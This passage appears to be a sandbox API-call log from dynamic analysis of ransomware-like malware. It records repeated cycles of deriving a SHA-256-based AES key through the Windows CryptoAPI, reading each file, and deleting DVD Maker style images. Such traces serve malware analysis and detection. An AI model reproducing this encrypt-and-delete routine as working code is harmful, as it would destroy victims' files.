hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0146.063] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.063] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0146.063] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13d0 [0146.063] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0146.065] CryptDestroyHash (hHash=0x284d568) returned 1 [0146.065] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0146.066] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.067] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_glass_thumbnail.bmp")) returned 0 [0146.067] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0146.068] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0146.068] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.068] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0146.068] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13d0 [0146.068] ReadFile (in: hFile=0x450, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0146.149] CryptDestroyHash (hHash=0x284d668) returned 1 [0146.149] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0146.149] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.150] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_highlights_thumbnail.bmp")) returned 0 [0146.150] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0146.151] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0146.151] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.151] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0146.151] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13d0 [0146.151] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0146.154] CryptDestroyHash (hHash=0x284d568) returned 1 [0146.154] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0146.154] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.155] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_performance_thumbnail.bmp")) returned 0 [0146.156] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0146.156] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0146.156] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.156] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0146.156] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13d0 [0146.156] ReadFile (in: hFile=0x450, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0146.159] CryptDestroyHash (hHash=0x284d668) returned 1 [0146.159] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0146.159] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.160] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_photo_thumbnail.bmp")) returned 0 [0146.161] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0146.161] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0146.161] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.161] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0146.161] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13d0 [0146.161] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0146.164] CryptDestroyHash (hHash=0x284d568) returned 1 [0146.164] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0146.164] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.165] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_plain_thumbnail.bmp")) returned 0 [0146.165] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0146.166] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0146.166] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.166] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0146.166] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13d0 [0146.166] ReadFile (in: hFile=0x450, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0146.169] CryptDestroyHash (hHash=0x284d668) returned 1 [0146.169] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0146.169] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.170] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_postage_thumbnail.bmp")) returned 0 [0146.171] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0146.172] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0146.172] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.172] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0146.172] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13d0 [0146.172] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0146.174] CryptDestroyHash (hHash=0x284d568) returned 1 [0146.175] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0146.175] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.176] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_scrapbook_thumbnail.bmp")) returned 0 [0146.176] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0146.177] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0146.177] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.177] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0146.177] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13d0 [0146.177] ReadFile (in: hFile=0x450, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0146.180] CryptDestroyHash (hHash=0x284d668) returned 1 [0146.180] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0146.180] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.181] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_specialocc_thumbnail.bmp")) returned 0 [0146.182] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0146.182] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0146.182] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.182] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0146.182] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13d0 [0146.182] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0146.185] CryptDestroyHash (hHash=0x284d568) returned 1 [0146.185] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0146.185] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.186] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_travel_thumbnail.bmp")) returned 0 [0146.187] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0146.187] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0146.187] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.187] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0146.187] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13d0 [0146.187] ReadFile (in: hFile=0x450, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0146.191] CryptDestroyHash (hHash=0x284d668) returned 1 [0146.191] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0146.191] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.192] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_widescreen_thumbnail.bmp")) returned 0 [0146.194] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0146.194] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.195] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.195] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.195] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.195] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11da [0146.195] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.197] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.197] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.197] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.199] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\1047x576black.png")) returned 0 [0146.199] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.199] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.199] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.199] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.200] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb04 [0146.200] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.202] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.202] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.202] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.203] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\203x8subpicture.png")) returned 0 [0146.204] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.204] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.205] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.205] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.205] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5aaf [0146.205] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.217] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.217] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.217] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.218] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\bandwidth.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\bandwidth.png")) returned 0 [0146.219] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.219] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.219] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.219] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.219] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x191f [0146.219] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.222] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.222] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.222] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.223] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\blackbars80.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\blackbars80.png")) returned 0 [0146.224] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.224] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.224] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.224] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.224] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13e0 [0146.224] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.228] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.228] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.228] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.230] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationleft_buttongraphic.png")) returned 0 [0146.230] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.231] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.231] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.231] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.231] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc3a [0146.231] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.233] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.233] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.233] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.234] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationleft_selectionsubpicture.png")) returned 0 [0146.235] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.235] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.235] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.235] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.235] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13a1 [0146.235] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.241] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.241] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.241] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.242] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationright_buttongraphic.png")) returned 0 [0146.243] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.243] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.243] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.243] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.243] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc2e [0146.243] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.245] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.245] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.245] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.247] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationright_selectionsubpicture.png")) returned 0 [0146.255] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0146.255] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.255] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.255] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.255] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x135b [0146.255] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.262] CryptDestroyHash 